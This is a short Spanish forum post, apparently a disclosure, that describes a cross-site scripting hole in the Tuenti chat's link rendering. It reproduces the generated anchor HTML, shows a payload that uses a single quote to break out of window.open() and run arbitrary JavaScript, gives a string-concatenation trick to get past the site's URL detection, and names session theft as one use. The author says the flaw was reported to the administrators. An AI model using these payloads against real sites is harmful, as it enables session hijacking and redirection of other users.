Advierto que la vulnerabilidad ya ha sido notificada a los administradores y que en breve será arreglada.
Bueno, la vulnerabilidad está en el chat a la hora de poner enlaces.
Si escribes en el chat 'http://hola.com', el código queda algo así :
Código
Fijense que en el atributo onclick aparece varias veces 'http://hola.com'.
<a href="http://hola.com" title="http://hola.com" onclick="LightBox.init_with_simple_template({'lightbox_id': 'light_box', 'width': '350'}, 'js_template_external_link', {'title': 'Link externo', 'message': 'El link al que intentas acceder está fuera de Tuenti.', 'url':'http://hola.com', 'question': '¿Estás seguro de que deseas continuar?', 'close_button': 'Cerrar', 'continue_button': 'Continuar'}, {'submit_light_box': function(){window.open('http://hola.com'); LightBox.close();}}); return false;" class="externalLink">http://hola.com</a>
Concretamente fijense en la función window.open(), ahí puedes insertar una comilla simple y escapar de la función.
Lo que se ha escrito en ese mensaje es :
Código:
http://haha
Ahora, ya deberíais saber como ejecutar el código javascript que quisierais :
Lo que se ha escrito en ese mensaje es :
Código:
http://');alert('XSS
Gracias a este XSS se podrían hacer multiples cosas como robar sesiones.
PD:Si quieres redireccionar de la típica manera con "location='http://google.com';" tendrías que hacerlo asi:
"location='h'+'ttp://google.com';"
Porque si encuentra en la cadena que mandes "http" lo interpretará como otra cadena.